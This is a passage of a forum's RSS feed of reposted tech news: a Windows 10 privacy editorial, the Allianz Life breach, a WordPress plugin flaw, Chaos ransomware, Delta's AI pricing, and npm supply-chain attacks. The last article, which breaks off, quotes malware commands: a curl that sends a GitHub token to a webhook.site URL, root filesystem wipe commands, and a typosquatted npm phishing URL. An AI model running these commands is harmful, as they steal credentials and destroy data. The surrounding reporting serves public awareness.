	<img alt="Windows 10 privacy settings" class="ipsImage" height="405" width="720" src="https://cdn.neowin.com/news/images/uploaded/2025/07/1753558922_1280x720-ghost-white-solid-color-background-fotor-2025072704129.webp">
</p>

<p>
	Things finally started to go in Microsoft's favor in April 2017, roughly two whole years after the launch of Windows 10. This was primarily because of the firm's <a automate_uuid="b36a3bf9-b68c-4127-a03e-3e28ed9de98e" href="https://www.neowin.net/news/microsoft-reveals-details-of-the-data-that-its-collecting-from-windows-10-devices/" rel="external nofollow">increased transparency regarding data collection</a>, <a automate_uuid="80ddfbd2-baae-4af0-85e5-5f7ca8d03fc5" href="https://www.neowin.net/news/windows-10-creators-update-a-closer-look-at-changes-to-privacy-settings/" rel="external nofollow">enhanced privacy controls</a>, and <a automate_uuid="580b51c7-d2e0-45f8-8e2c-e23f3897523c" href="https://www.neowin.net/news/microsoft-now-reminds-users-to-install-latest-windows-10-version-and-review-privacy-settings/" rel="external nofollow">useful privacy reminders when installing new versions of Windows 10</a>. By August 2017, Microsoft put out a statement saying that <a automate_uuid="2baf44d9-03ed-4eb5-9e2f-3c6ca9bae109" href="https://www.neowin.net/news/microsoft-says-its-seen-a-positive-reception-to-windows-10-privacy-improvements/" rel="external nofollow">it is seeing "positive reception" from customers regarding privacy</a>, indicating that it had finally turned a corner on the specific topic.
</p>

<p>
	 
</p>

<p>
	This did not mean that Microsoft had been completely absolved by the public and regulators. It was still the target of <a automate_uuid="2638fd8b-9175-4db8-a8b0-4350e861c63e" href="https://www.neowin.net/news/windows-10-violates-data-protection-law-according-to-dutch-dpa/" rel="external nofollow">regular regulator scrutiny</a>, despite releasing <a automate_uuid="4b2bafbd-388a-410b-9b6d-0d8c0966601c" href="https://www.neowin.net/news/you-will-have-more-control-over-windows-10s-data-collection-soon/" rel="external nofollow">new privacy controls frequently</a> and constantly assuring customers that <a automate_uuid="f0c16652-f210-4272-909a-63d32448acc7" href="https://www.neowin.net/news/microsoft-says-windows-10-is-not-sending-your-data-to-the-cloud-when-you-tell-it-not-to/" rel="external nofollow">their data is not being sent to Microsoft without their consent</a>. But it was clear that the worst was now behind.
</p>

<h3>
	Where we stand now
</h3>

<figure class="image image--expandable">
	<img alt="Windows logo on a background of binary text" class="ipsImage" height="405" width="720" src="https://cdn.neowin.com/news/images/uploaded/2025/07/1752333429_100.webp">
</figure>

<p>
	I would argue that the entire privacy and telemetry fiasco surrounding Windows 10 was blown out of proportion. I will emphasize again: telemetry collection is a regular process in software development and productionization, and it's something that every big firm does. However, a target was put on Microsoft's back just because it was a hot topic to spread fear, uncertainty, and doubt (FUD).
</p>

<p>
	 
</p>

<p>
	As a Windows 10 veteran who has been around since the earliest days of the operating system's Technical Previews, I'm glad that we still managed to extract something positive out of this experience. Microsoft became very conscious about privacy (until Windows 11 Recall, that is), while we as customers began to understand that our data matters to us. Just because Windows 10 was not spying on us didn't mean that no one else is either. Media outlets like Neowin also became conscious of the topic, which is the main reason why we were able to avoid the disastrous initial launch of Windows 11 Recall.
</p>

<p>
	 
</p>

<p>
	Despite how all of this started, all the FUD, I'm at least glad about where we ended. Although Windows 10 is adored by Microsoft customers even now, things weren't always like this. And as we celebrate the 10th birthday of the OS and its imminent device, it's important to be mindful of the fact that <a automate_uuid="56086d42-286e-4d11-ace6-52b680d46f54" href="https://www.neowin.net/news/this-is-the-data-windows-collects-about-you/" rel="external nofollow">this is the operating system that made us so conscious about software privacy, and that's a good thing</a>.
</p>

<p>
	 
</p>

<hr>
<p>
	 
</p>

<p>
	<em>This story is a part of our "10 Years of Windows 10" collection, in celebration of the operating system's tenth anniversary, falling on July 29, 2025. Over the next few days and weeks, you'll be able to find more content on this topic in our <a automate_uuid="2c2302c4-9abd-46d1-8168-2690bb7d5d4f" href="https://www.neowin.net/news/tags/10_years_of_windows_10/" rel="external nofollow">dedicated section available here</a>.</em>
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/editorials/windows-10-is-the-reason-why-we-are-so-conscious-about-privacy-now/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Sunday 27 July 2025 at 1:17 pm AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
</p>
]]></description><guid isPermaLink="false">30462</guid><pubDate>Sun, 27 Jul 2025 03:18:58 +0000</pubDate></item><item><title>Allianz Life confirms data breach impacts majority of 1.4 million customers</title><link>https://nsaneforums.com/news/security-privacy-news/allianz-life-confirms-data-breach-impacts-majority-of-14-million-customers-r30460/</link><description><![CDATA[<p>
	Insurance company Allianz Life has confirmed that the personal information for the "majority" of its 1.4 million customers was exposed in a data breach that occurred earlier this month.
</p>

<p>
	 
</p>

<p>
	"On July 16, 2025, a malicious threat actor gained access to a third-party, cloud-based CRM system used by Allianz Life Insurance Company of North America (Allianz Life)," an Allianz Life spokesperson told BleepingComputer.
</p>

<p>
	 
</p>

<p>
	"The threat actor was able to obtain personally identifiable data related to the majority of Allianz Life's customers, financial professionals, and select Allianz Life employees, using a social engineering technique."
</p>

<p>
	 
</p>

<p>
	"We took immediate action to contain and mitigate the issue and notified the FBI. Based on our investigation to-date, there is no evidence the Allianz Life network or other company systems were accessed, including our policy administration system."
</p>

<p>
	 
</p>

<p>
	"Our investigation is ongoing and we began the process of reaching out to individuals impacted with dedicated resources to assist them. This incident is related only to Allianz Life, which currently has 1.4 million customers."
</p>

<p>
	 
</p>

<p>
	Allianz Life is a US-based provider of annuities and life insurance for over 1.4 million Americans. The company is owned by Allianz SE, a global financial services group headquartered in Germany, serving more than 128 million customers.
</p>

<p>
	 
</p>

<p>
	The company first revealed the breach in a mandatory filing with <a href="https://www.maine.gov/agviewer/content/ag/985235c7-cb95-4be2-8792-a1252b4f8318/0446bff3-a013-43ed-82fa-bca6bb157de1.html" rel="external nofollow" target="_blank">Maine's Attorney General's Office</a> on Saturday, issuing a placeholder notification alerting of the breach.
</p>

<p>
	 
</p>

<p>
	"The consumer notice will be provided once Allianz has identified the affected individuals," reads the placeholder notification.
</p>

<p>
	 
</p>

<p>
	While Allianz Life declined to answer questions about the threat actor and whether they were being extorted, BleepingComputer has learned that the attack is believed to have been conducted by the ShinyHunters extortion group.
</p>

<p>
	 
</p>

<p>
	ShinyHunters is a group of threat actors who are linked to multiple high-profile data breaches and attacks, including those against <a href="https://www.bleepingcomputer.com/news/security/powerschool-hacker-now-extorting-individual-school-districts/" rel="external nofollow" target="_blank">PowerSchool</a> and the <a href="https://www.bleepingcomputer.com/tag/snowflake/" rel="external nofollow" target="_blank">SnowFlake attacks</a>, which impacted <a href="https://www.bleepingcomputer.com/news/security/shinyhunters-claims-santander-breach-selling-data-for-30m-customers/" rel="external nofollow" target="_blank">Santander</a>, <a href="https://www.bleepingcomputer.com/news/security/stolen-ticketmaster-data-from-snowflake-attacks-briefly-for-sale-again/" rel="external nofollow" target="_blank">Ticketmaster</a>, <a href="https://www.bleepingcomputer.com/news/security/massive-atandt-data-breach-exposes-call-logs-of-109-million-customers/" rel="external nofollow" target="_blank">AT&amp;T</a>, <a href="https://www.bleepingcomputer.com/news/security/advance-auto-parts-data-breach-impacts-23-million-people/" rel="external nofollow" target="_blank">Advance Auto Parts</a>, <a href="https://www.bleepingcomputer.com/news/security/neiman-marcus-data-breach-31-million-email-addresses-found-exposed/" rel="external nofollow" target="_blank">Neiman Marcus</a>, and <a href="https://www.bleepingcomputer.com/news/security/cylance-confirms-data-breach-linked-to-third-party-platform/" rel="external nofollow" target="_blank">Cylance</a>.
</p>

<p>
	 
</p>

<p>
	While multiple ShinyHunters members have <a href="https://www.bleepingcomputer.com/news/security/shinyhunters-member-gets-3-years-in-prison-for-breaching-60-firms/" rel="external nofollow" target="_blank">been arrested</a> over the <a href="https://www.bleepingcomputer.com/news/security/powerschool-hacker-pleads-guilty-to-student-data-extortion-scheme/" rel="external nofollow" target="_blank">past few years</a>, including a <a href="https://www.bleepingcomputer.com/news/security/breachforums-hacking-forum-operators-reportedly-arrested-in-france/" rel="external nofollow" target="_blank">recent arrest in France</a>, the hacking group continues to conduct attacks.
</p>

<p>
	 
</p>

<p>
	Last month, Mandiant warned that ShinyHunters had begun to <a href="https://www.bleepingcomputer.com/news/security/google-hackers-target-salesforce-accounts-in-data-extortion-attacks/" rel="external nofollow" target="_blank">target Salesforce CRM customers</a> in social engineering attacks.
</p>

<p>
	 
</p>

<p>
	During these attacks, the hackers impersonate IT support personnel, requesting the targeted employee accept a connection to Salesforce Data Loader, a client application that allows users to import, export, update, or delete data within Salesforce environments.
</p>

<p>
	 
</p>

<p>
	Once the connection is accepted, the threat actors use Salesforce Data Loader to exfiltrate data from Salesforce, which is then used to extort the company.
</p>

<p>
	 
</p>

<p>
	BleepingComputer asked Allianz Life if the CRM is Salesforce, but the spokesperson declined to comment.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/allianz-life-confirms-data-breach-impacts-majority-of-14-million-customers/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Sunday 27 July 2025 at 1:15 pm AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
</p>
]]></description><guid isPermaLink="false">30460</guid><pubDate>Sun, 27 Jul 2025 03:15:33 +0000</pubDate></item><item><title>Post SMTP plugin flaw exposes 200K WordPress sites to hijacking attacks</title><link>https://nsaneforums.com/news/security-privacy-news/post-smtp-plugin-flaw-exposes-200k-wordpress-sites-to-hijacking-attacks-r30459/</link><description><![CDATA[<p>
	More than 200,000 WordPress websites are using a vulnerable version of the Post SMTP plugin that allows hackers to take control of the administrator account.
</p>

<p>
	 
</p>

<p>
	Post SMTP is a popular email delivery plugin for WordPress that counts more than 400,000 active installations. It’s marketed as a replacement of the default ‘<em>wp_mail()</em>’ function that is more reliable and feature-rich.
</p>

<p>
	 
</p>

<p>
	On May 23, a security researcher reported the vulnerability to WordPress security firm PatchStack. The flaw is now identified as CVE-2025-24000 and received a medium severity score of 8.8.
</p>

<p>
	 
</p>

<p>
	The security issue affects all versions of Post SMTP up to 3.2.0 and is due to a broken access control mechanism in the plugin’s REST API endpoints, which only verified if a user was logged in, without checking their permission level.
</p>

<p>
	 
</p>

<p>
	This means that low-privileged users, such as Subscribers, could access email logs containing full email content.
</p>

<p>
	 
</p>

<p>
	On vulnerable sites, a subscriber could initiate a password reset for an Administrator account, intercept the reset email via the logs, and gain control of the account.
</p>

<div style="">
	<figure class="image" style="display:inline-block">
		<img alt="The vulnerable code" class="ipsImage" height="720" width="677" src="https://www.bleepstatic.com/images/news/u/1220909/2025/July/vuln.jpg">
		<figcaption>
			<em>The vulnerable code<br>
			Source: PatchStack</em>
		</figcaption>
	</figure>
</div>

<p>
	The plugin’s developer, Saad Iqbal, was informed about the flaw and responded with a fix for Patchstack to review on May 26.
</p>

<p>
	 
</p>

<p>
	The solution was to incorporate additional privilege checks in the ‘get_logs_permission’ function that would validate a user’s permissions before giving access to sensitive API calls.
</p>

<p>
	 
</p>

<p>
	The fix was incorporated into Post SMTP version 3.3.0, which was published on June 11.
</p>

<p>
	 
</p>

<p>
	Download statistics on <a href="https://wordpress.org/plugins/post-smtp/advanced/" rel="external nofollow" target="_blank">WordPress.org</a> show that less than half of the plugin's user base (48.5%) has updated to version 3.3. This means that more than 200,000 websites are vulnerable to CVE-2025-24000.
</p>

<p>
	 
</p>

<p>
	A notable 24.2%, corresponding to 96,800 sites, still run Post SMTP versions from the 2.x branch, which is vulnerable to additional security flaws, leaving them open to attacks.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/post-smtp-plugin-flaw-exposes-200k-wordpress-sites-to-hijacking-attacks/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Sunday 27 July 2025 at 1:14 pm AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
</p>
]]></description><guid isPermaLink="false">30459</guid><pubDate>Sun, 27 Jul 2025 03:14:48 +0000</pubDate></item><item><title>After BlackSuit is taken down, new ransomware group Chaos emerges</title><link>https://nsaneforums.com/news/security-privacy-news/after-blacksuit-is-taken-down-new-ransomware-group-chaos-emerges-r30447/</link><description><![CDATA[<h3>
	As BlackSuit's dark web site goes dark, Chaos is already around to pick up the slack.
</h3>

<p>
	Hot on the heels of a major ransomware group being taken down through an international law enforcement operation comes a new development that highlights the whack-a-mole nature of such actions: A new group, likely comprised of some of the same members, has already taken its place.
</p>

<p>
	 
</p>

<p>
	The new group calls itself Chaos, in recognition of the .chaos name extension its ransomware stamps on files it has encrypted and the “readme.chaos[.]txt” name given to ransom notes sent to victims. Researchers at Cisco’s Talos Security Group <a href="https://blog.talosintelligence.com/new-chaos-ransomware/" rel="external nofollow">said Thursday</a> that since Chaos emerged in February, it has engaged in “big-game hunting”—meaning attacks designed to extract hefty payments—that have mainly targeted organizations in the US and, to a lesser extent, the UK, New Zealand, and India. Talos said it recently observed the group demanding a ransom of about $300,000.
</p>

<h2>
	Walking in your footsteps
</h2>

<p>
	In exchange for paying the demanded ransom, victims get a pinky swear that they’ll receive a decryptor and a detailed report of the vulnerabilities the group members found in the victim’s network and that the group will delete all the data in its possession. Victims who refuse to pay face the threat of never getting their data unlocked, having data publicly disclosed, and being subjected to distributed denial-of-service attacks.
</p>

<p>
	 
</p>

<p>
	Cisco’s report came within hours of an international law enforcement action dubbed Operation CheckMate taking down the name-and-shame dark web site belonging to BlackSuit, a ransomware gang that, <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a" rel="external nofollow">according to</a> the US Cybersecurity and Infrastructure Security Agency, has demanded more than $500 million in payments in its short history.
</p>

<p>
	 
</p>

<p>
	Talos said Chaos is likely either a rebranding of the BlackSuit ransomware or is operated by some of the former BlackSuit members. Talos based its assessment on the similarities in the encryption mechanisms in the ransomware, the theme and structure of the ransom notes, the remote monitoring and management tools used to access targeted networks, and its choice of <a href="https://lolbas-project.github.io/lolbas/Scripts/pester/" rel="external nofollow">LOLbins</a>—meaning executable files natively found in Windows environments—to compromise targets. LOLbins get their name because they’re binaries that allow the attackers to live off the land.
</p>

<p>
	 
</p>

<p>
	The Talos post was published around the same time that the dark web site belonging to BlackSuit began displaying a message saying the site had been seized in Operation CheckMate. Organizations that participated in the takedown included the US Department of Justice, the US Department of Homeland Security, the US Secret Service, the Dutch National Police, the German State Criminal Police Office, the UK National Crime Agency, the Frankfurt General Prosecutor's Office, the Justice Department, the Ukrainian Cyber Police, and Europol.
</p>

<figure class="ars-wp-img-shortcode id-2108582 align-center">
	<div>
		<div class="ars-lightbox">
			<div class="ars-lightbox-item">
				<img alt="operation-checkmate-640x232.jpg" class="center medium" decoding="async" height="232" loading="lazy" sizes="auto, (max-width: 640px) 100vw, 640px" srcset="https://cdn.arstechnica.net/wp-content/uploads/2025/07/operation-checkmate-640x232.jpg 640w, https://cdn.arstechnica.net/wp-content/uploads/2025/07/operation-checkmate-1024x371.jpg 1024w, https://cdn.arstechnica.net/wp-content/uploads/2025/07/operation-checkmate-768x278.jpg 768w, https://cdn.arstechnica.net/wp-content/uploads/2025/07/operation-checkmate-1536x556.jpg 1536w, https://cdn.arstechnica.net/wp-content/uploads/2025/07/operation-checkmate-2048x742.jpg 2048w, https://cdn.arstechnica.net/wp-content/uploads/2025/07/operation-checkmate-980x355.jpg 980w, https://cdn.arstechnica.net/wp-content/uploads/2025/07/operation-checkmate-1440x522.jpg 1440w" width="640" src="https://cdn.arstechnica.net/wp-content/uploads/2025/07/operation-checkmate-640x232.jpg">
				<div class="pswp-caption-content" id="caption-2108582">
					<em>Screenshot </em>
				</div>
			</div>
		</div>
	</div>
</figure>

<p>
	Chaos typically gains initial access through social engineering using email or voice phishing techniques. Eventually, the victim is persuaded to contact an IT security representative, who, in fact, is part of the ransomware operation. The Chaos member instructs the target to launch Microsoft Quick Assist, a remote-assistance tool built into Windows, and connect to the attacker’s endpoint.
</p>

<p>
	 
</p>

<p>
	Chaos' predecessor, BlackSuit, is a rebranding of an earlier ransomware operation known as Royal. Royal, according to <a href="https://www.trendmicro.com/en_us/research/22/l/conti-team-one-splinter-group-resurfaces-as-royal-ransomware-wit.html" rel="external nofollow">Trend Micro</a>, is a splinter group of the Conti ransomware group. The circle of ransomware groups continues.
</p>

<p>
	 
</p>

<p>
	<a href="https://arstechnica.com/security/2025/07/after-blacksuit-is-taken-down-new-ransomware-group-chaos-emerges/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Saturday 26 July 2025 at 1:06 pm AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
</p>
]]></description><guid isPermaLink="false">30447</guid><pubDate>Sat, 26 Jul 2025 03:07:18 +0000</pubDate></item><item><title>Delta&#x2019;s AI spying to &#x201C;jack up&#x201D; prices must be banned, lawmakers say</title><link>https://nsaneforums.com/news/security-privacy-news/delta%E2%80%99s-ai-spying-to-%E2%80%9Cjack-up%E2%80%9D-prices-must-be-banned-lawmakers-say-r30446/</link><description><![CDATA[<h3>
	Lawmakers want to prevent companies from using AI to increase prices or lower wages.
</h3>

<p>
	One week after <a href="https://arstechnica.com/tech-policy/2025/07/will-ai-end-cheap-flights-critics-attack-deltas-predatory-ai-pricing/" rel="external nofollow">Delta announced it is expanding a test using artificial intelligence</a> to charge different prices based on customers' personal data—which critics fear could end cheap flights forever—Democratic lawmakers have moved to ban what they consider predatory surveillance pricing.
</p>

<p>
	 
</p>

<p>
	In a <a href="https://casar.house.gov/media/press-releases/news-congressman-greg-casar-introduces-new-stop-ai-price-gouging-and-wage" rel="external nofollow">press release</a>, Reps. Greg Casar (D-Texas) and Rashida Tlaib (D-Mich.) announced the <a href="https://drive.google.com/file/d/1HQoQhvfVv8p0XmOdDIiWTnmd2YM_za07/view" rel="external nofollow">Stop AI Price Gouging and Wage Fixing Act</a>. The law directly bans companies from using "surveillance-based" price or wage setting to increase their profit margins.
</p>

<p>
	 
</p>

<p>
	If passed, the law would allow anyone to sue companies found unfairly using AI, lawmakers explained in what's called a "<a href="https://drive.google.com/file/d/1xJ3K-8L23-00XRTrFS-zUlBHiCo8feD5/view" rel="external nofollow">one-sheet</a>." That could mean charging customers higher prices—based on "how desperate a customer is for a product and the maximum amount a customer is willing to pay"—or paying employees lower wages—based on "their financial status, personal associations, and demographics."
</p>

<p>
	 
</p>

<p>
	Tlaib called companies using AI to "exploit" workers in "desperate" situations "appalling," with the one-sheet specifically shaming delivery services that lower drivers' wages based on their "pattern of taking orders" and health care companies that base nurses' pay on "an algorithmically-manipulated-bidding war, not the tasks they perform."
</p>

<p>
	 
</p>

<p>
	The lawmakers also called out Delta among companies whose AI pricing plans, advocacy groups warn, stand to worsen the US "affordability crisis" that currently sees many Americans struggling to afford basic items, like groceries. Delta has confirmed it plans to "set 20 percent of prices using AI by the end of the year," lawmakers noted.
</p>

<p>
	 
</p>

<p>
	Asked for comment on the bill, a Delta spokesperson confirmed the airline will be reaching out to Senators to explain its AI pricing. In a statement, Delta denied that its AI system used personalized data for individualized pricing. Instead, it apparently relies on AI to forecast demand for certain flights, adapt to emerging market conditions (like jet fuel costs), and factor in a wide variety of undisclosed variables, in addition to learning from pricing decisions. However, factors like customer purchasing behavior, customer demand, and competitive offers that perhaps that customer is known to be weighing also influence the AI's pricing, which lawmakers and critics may be interpreting as individualized pricing.
</p>

<p>
	 
</p>

<p>
	"There is no fare product Delta has ever used, is testing or plans to use that targets customers with individualized offers based on personal information or otherwise," Delta said. "A variety of market forces drive the dynamic pricing model that’s been used in the global industry for decades, with new tech simply streamlining this process. Delta always complies with regulations around pricing and disclosures."
</p>

<p>
	 
</p>

<p>
	Other companies "engaging in surveillance-based price setting" include giants like Amazon and Kroger, as well as a ride-sharing app that has been "charging a customer more when their phone battery is low."
</p>

<p>
	 
</p>

<p>
	Public Citizen, a progressive consumer rights group that endorsed the bill, condemned the practice in the press release, urging Congress to pass the law and draw "a clear line in the sand: companies can offer discounts and fair wages—but not by spying on people."
</p>

<p>
	 
</p>

<p>
	"Surveillance-based price gouging and wage setting are exploitative practices that deepen inequality and strip consumers and workers of dignity," Public Citizen said.
</p>

<h2>
	AI pricing will cause “full-blown crisis”
</h2>

<p>
	In January, the Federal Trade Commission requested information from eight companies—including MasterCard, Revionics, Bloomreach, JPMorgan Chase, Task Software, PROS, Accenture, and McKinsey &amp; Co—joining a "shadowy market" that provides AI pricing services. Those companies confirmed they've provided services to at least 250 companies "that sell goods or services ranging from grocery stores to apparel retailers," lawmakers noted.
</p>

<p>
	 
</p>

<p>
	That inquiry led the FTC to <a href="https://www.ftc.gov/news-events/news/press-releases/2025/01/ftc-surveillance-pricing-study-indicates-wide-range-personal-data-used-set-individualized-consumer" rel="external nofollow">conclude</a> that "widespread adoption of this practice may fundamentally upend how consumers buy products and how companies compete."
</p>

<p>
	 
</p>

<p>
	In the press release, the anti-monopoly watchdog, the American Economic Liberties Project, was counted among advocacy groups endorsing the Democrats' bill. Their senior legal counsel, Lee Hepner, pointed out that "grocery prices have risen 26 percent since the pandemic-era explosion of online shopping," and that's "dovetailing with new technology designed to squeeze every last penny from consumers."
</p>

<p>
	 
</p>

<p>
	Hepner pushed lawmakers to support the legislation banning AI surveillance pricing, suggesting that could help "restore fair, transparent, and predictable pricing." Otherwise, "there is no such thing as a good deal when every consumer is charged a different price," Hepner warned.
</p>

<p>
	 
</p>

<p>
	For consumers and workers who may not even realize they've been subjected to AI spying, the law offers paths through their state, the FTC, and the Equal Employment Opportunity Commission to sue. Any violations could force companies to either pay back the difference in any unfair transactions that AI systems recommended or $3,000—whichever is higher. And willful violations could triple damages owed.
</p>

<p>
	 
</p>

<p>
	"Giant corporations should not be allowed to jack up your prices or lower your wages using data they got spying on you," Casar said. "Whether you know it or not, you may already be getting ripped off by corporations using your personal data to charge you more. This problem is only going to get worse, and Congress should act before this becomes a full-blown crisis."
</p>

<p>
	 
</p>

<p>
	It's unclear if the Democrats can win enough support from Republicans to pass the bill. Perhaps notably, Republican FTC commissioners voted against releasing the report outlining potential concerns with AI surveillance pricing and wage setting.
</p>

<p>
	 
</p>

<p>
	In their <a href="https://www.ftc.gov/system/files/ftc_gov/pdf/surveillance-pricing-6b-research-summaries-ferguson-dissent-final.pdf" rel="external nofollow">dissent</a>, commissioners Andrew Ferguson and Melissa Holyoak suggested the report was published prematurely, criticizing Biden's outgoing FTC for "nakedly" politicizing the agency and taking an "unprecedented" step in sharing preliminary summaries of findings.
</p>

<p>
	 
</p>

<p>
	However, they did agree that when the final report is ready, the "American public and Congress will surely value what the Commission ultimately learns and shares as to whether and how consumers’ private data may be used to affect their pocketbooks, especially as the future of our nation’s privacy laws is being considered."
</p>

<p>
	 
</p>

<p>
	<a href="https://arstechnica.com/tech-policy/2025/07/deltas-ai-spying-to-jack-up-prices-must-be-banned-lawmakers-say/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Saturday 26 July 2025 at 1:05 pm AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
</p>
]]></description><guid isPermaLink="false">30446</guid><pubDate>Sat, 26 Jul 2025 03:06:35 +0000</pubDate></item><item><title>Supply-chain attacks on open source software are getting out of hand</title><link>https://nsaneforums.com/news/security-privacy-news/supply-chain-attacks-on-open-source-software-are-getting-out-of-hand-r30445/</link><description><![CDATA[<h3>
	Attacks affected packages, including one with ~2.8 million weekly downloads.
</h3>

<p>
	It has been a busy week for supply-chain attacks targeting open source software available in public repositories, with successful breaches of multiple developer accounts that resulted in malicious packages being pushed to unsuspecting users.
</p>

<p>
	 
</p>

<p>
	The latest target, <a href="https://socket.dev/blog/toptal-s-github-organization-hijacked-10-malicious-packages-published" rel="external nofollow">according to</a> security firm Socket, is JavaScript code available on repository npm. A total of 10 packages available from the npm page belonging to global talent agency Toptal contained malware and were downloaded by roughly 5,000 users before the supply-chain attack was detected. The packages have since been removed. This was the third supply-chain attack Socket has observed on npm in the past week.
</p>

<h2>
	Poisoning the well
</h2>

<p>
	The hackers behind the attack pulled it off by first compromising Toptal’s GitHub Organization and from there using that access to publish the malicious packages on npm.
</p>

<p>
	 
</p>

<p>
	Researchers still don’t know precisely how the attack worked and what the precise relationship was between the GitHub repository changes and the publishing of the packages on npm. Socket said in an email that the npm publishing “likely happed through GitHub Actions or stored npm tokens, which were accessible once the GitHub Organization was breached.” GitHub and npm are often linked in workflows, allowing the publishing of npm packages once a GitHub organization is hijacked.
</p>

<p>
	 
</p>

<p>
	“The attack could have originated from compromised GitHub access that enabled both repository modifications and npm publishing, or from separate compromise vectors that affected both platforms independently,” Socket researchers <a href="https://socket.dev/blog/toptal-s-github-organization-hijacked-10-malicious-packages-published" rel="external nofollow">wrote Wednesday</a>. “Without additional forensic evidence, determining the precise sequence and relationship between these events remains challenging.”
</p>

<p>
	 
</p>

<p>
	Toptal has yet to say how its account was compromised. Company representatives didn’t respond to an email asking.
</p>

<p>
	 
</p>

<p>
	The malicious <a href="https://socket.dev/npm/package/@toptal/picasso-forms/files/73.3.2/package.json#L20" rel="external nofollow">payload</a> inserted into the packages had two stages. First, the code extracted the target's GitHub authentication token and sent it to an attacker-controlled endpoint at the domain webhook.site. These tokens gave the attackers persistent access to the target’s GitHub repositories, which could in turn be used in further supply-chain attacks.
</p>

<p>
	 
</p>

<p>
	The command invoking the extraction was:
</p>

<p>
	 
</p>

<p style="margin-left: 40px;">
	<code>curl -d "$(gh auth token)" https://webhook[.]site/fb5b4647-aff8-418c-99e7-ec830cc2024b</code>
</p>

<p>
	 
</p>

<p>
	After the credentials were exfiltrated, the payload tried to delete the entire filesystem of the target’s device. The script contained commands for destroying file systems on either Unix-like or Windows operating systems. The Unix command used was:
</p>

<p>
	 
</p>

<p style="margin-left: 40px;">
	<code>sudo rm -rf --no-preserve-root / </code>
</p>

<p>
	 
</p>

<p>
	The --no-preserve-root flag is specifically designed to override safety protections that would normally prevent deletion of the root directory.
</p>

<p>
	 
</p>

<p>
	The postinstall script that includes a Windows-equivalent destructive command was:
</p>

<p>
	 
</p>

<p style="margin-left: 40px;">
	<code>rm /s /q</code>
</p>

<p>
	 
</p>

<p>
	Socket published a <a href="https://socket.dev/blog/toptal-s-github-organization-hijacked-10-malicious-packages-published" rel="external nofollow">separate report</a> Wednesday on yet more supply-chain attacks, one targeting npm users and another targeting users of PyPI. As of Wednesday, the four malicious packages—three published to npm and the fourth on PyPI—collectively had been downloaded more than 56,000 times. Socket said it was working to get them removed.
</p>

<p>
	 
</p>

<p>
	When installed, the packages “covertly integrate surveillance functionality into the developer’s environment, enabling keylogging, screen capture, fingerprinting, webcam access, and credential theft,” Socket researchers wrote. They added that the malware monitored and captured user activity and transmitted it to attacker-controlled infrastructure. Socket used the term surveillance malware to emphasize the covert observation and data exfiltration tactics “in the context of malicious dependencies.”
</p>

<p>
	 
</p>

<p>
	Last Friday, Socket <a href="https://socket.dev/blog/npm-phishing-campaign-leads-to-prettier-tooling-packages-compromise" rel="external nofollow">reported</a> the third attack. This one compromised an account on npm and used the access to plant malicious code inside three packages available on the site. The compromise occurred after the attackers successfully obtained a credential token that the developer used to authenticate to the site.
</p>

<p>
	 
</p>

<p>
	The attackers obtained the credential through a targeted phishing attack Socket had disclosed <a href="https://socket.dev/blog/npm-phishing-email-targets-developers-with-typosquatted-domain" rel="external nofollow">hours earlier</a>. The email instructed the recipient to log in through a URL on npnjs.com. The site is a typosquatting spoof of the official npmjs.com domain. To make the attack more convincing, the phishing URL contained a token field that mimicked tokens npm uses for authentication. The phishing URL was in the format of <code><a href="https://npnjs.com/login?token=xxxxxx" ipsnoembed="false" rel="external nofollow">https://npnjs.com/login?token=xxxxxx</a></code> where the xxxxxx represented the token.
</p>

<figure class="ars-wp-img-shortcode id-2108339 align-center">
	<div>
		<div class="ars-lightbox">
			<div class="ars-lightbox-item">
